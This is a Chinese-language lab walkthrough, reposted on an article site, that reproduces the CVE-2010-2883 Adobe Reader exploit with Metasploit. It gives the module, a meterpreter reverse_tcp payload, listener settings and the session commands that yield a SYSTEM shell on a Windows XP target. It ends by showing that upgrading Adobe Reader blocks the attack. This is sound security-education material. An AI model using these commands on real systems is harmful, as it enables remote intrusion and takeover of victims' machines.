CVE-2010-2883-PDF漏洞提权复现过程

这篇具有很好参考价值的文章主要介绍了CVE-2010-2883-PDF漏洞提权复现过程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

第二步,打开Kali Linux渗透机使用命令msfconsole进入Metasploit渗透测试平台,使用模块adobe_cooltype_sing生成木马文件。

输入search adobe_cooltype_sing命令搜索Adobe渗透模块

CVE-2010-2883-PDF漏洞提权复现过程

 

与漏洞相关的模块有两个,编号为0的模块是使用本地的服务器挂载木马文件的模块,编号为1的模块是生成木马文件需要用到的模块。

使用use exploit/windows/browser/adobe_cooltype_sing命令调用渗透模块,并查看模块的详情

CVE-2010-2883-PDF漏洞提权复现过程

 

使用set SRVHOST 172.16.1.100命令,设置渗透机监听的Apache服务地址

CVE-2010-2883-PDF漏洞提权复现过程

 

使用set payload windows/meterpreter/reverse_tcp命令设置meterpreter载荷CVE-2010-2883-PDF漏洞提权复现过程

 

使用set LHOST 172.16.1.100命令设置Kali用于监听本地地址

CVE-2010-2883-PDF漏洞提权复现过程

 

使用set LPORT 命令设置本地用于监听的端口CVE-2010-2883-PDF漏洞提权复现过程

 

使用命令show options查看配置完成的参数

CVE-2010-2883-PDF漏洞提权复现过程

 

最后使用命令exploit执行模块

CVE-2010-2883-PDF漏洞提权复现过程

 

得到一个http://172.16.1.100:8080/RlMOOPnOuIvk的URL地址

第三步,打开靶机Windows XP的IE浏览器,使用浏览器访问上面生成的URL

CVE-2010-2883-PDF漏洞提权复现过程

 

第四步,切换至渗透机中查看效果

CVE-2010-2883-PDF漏洞提权复现过程

 

此时已获得系统最高权限,使用命令session -i查看当前后台活跃的会话。

CVE-2010-2883-PDF漏洞提权复现过程

 

使用命令session -i 1切换到编号为1的会话中,并使用命令shell进入靶机命令终端

CVE-2010-2883-PDF漏洞提权复现过程

 

第五步,回到靶机Windows XP安装最新版的Adobe Reader阅读软件。首先在安装新版本的Adobe Reader软件之前卸载旧版本的软件

CVE-2010-2883-PDF漏洞提权复现过程

 

选择Remove,然后点Next,接下来直接选Next继续,将Adobe Reader卸载掉

CVE-2010-2883-PDF漏洞提权复现过程

 

然后安装新的版本,安装文件(Adobe_Reader_11.exe)位于桌面  

 

勾选上自动安装更新(推荐)(A),然后点安装

CVE-2010-2883-PDF漏洞提权复现过程

安装成功后再次访问URL链接

CVE-2010-2883-PDF漏洞提权复现过程

 

回到渗透机中查看效果

CVE-2010-2883-PDF漏洞提权复现过程

发现木马已经失效,加固成功。文章来源地址https://www.toymoban.com/news/detail-494788.html

到了这里,关于CVE-2010-2883-PDF漏洞提权复现过程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • log4j2漏洞CVE-2021-44228复现笔记(纯步骤过程,没有复杂的知识点)

    前言: Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。 2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。Log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:和ld

    2024年02月12日
    浏览(47)
  • Linux脏牛提权漏洞复现(DirtyCow)

    脏牛(DirtyCow)是Linux中的一个提权漏洞。主要产生的原因是Linux系统的内核中Copy-on-Write(COW)机制产生的竞争条件问题导致,攻击者可以破坏私有只读内存映射,并提升为本地管理员权限。 靶机:vulnhub——Lampiao 192.168.230.217 攻击机:Kali 192.168.230.128 1、对 192.168.230.0/24 这一个

    2024年03月21日
    浏览(52)
  • sudo堆缓冲区溢出提权漏洞(CVE-2021-3156)

    这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通

    2024年02月13日
    浏览(44)
  • [漏洞分析] 用chatGPT分析CVE-2023-0386 overlay内核提权

    本文的理论知识(命名空间、overlay文件系统、fuse文件系统等)均来自chatGPT。 漏洞编号: CVE-2023-0386 漏洞产品: linux kernel - overlay文件系统 影响范围: 5.11 ~ 5.19 利用条件: 可以unshar 或可以创建overlay文件系统 利用效果: 本地提权 自己编译内核: 准备漏洞版本范围内的,5.15版本之

    2024年02月05日
    浏览(43)
  • Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现

    Kali版本:2022.3 目标主机ip:192.168.186.148 攻击机ip:192.168.186.147 vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式 登陆界面如下,此时账户密码未知

    2024年01月21日
    浏览(43)
  • CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行

    2023年04月21日
    浏览(60)
  • CVE-2022-30887漏洞复现

    多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传

    2023年04月08日
    浏览(49)
  • CVE-2017-7921漏洞复现

    0x01 CVE-2017-7921漏洞复现 许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。 0x02 漏洞复现: 利用工具发现漏洞(CVE-2017-7921): 利用路径:/Security/users?auth=YWRtaW46MTEK 附:检索所有用户及其角色的列表 利用路径:/onvif-http/snapshot?auth=YWRtaW46MTEK 附

    2024年02月12日
    浏览(44)
  • CVE-2015-5254漏洞复现

    1.漏洞介绍。 Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务,集群,Spring Framework 等。Apache ActiveMQ 5.13.0之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的

    2023年04月24日
    浏览(41)
  • CVE-2016-3088漏洞复现

    1.背景介绍。 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写

    2023年04月25日
    浏览(65)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包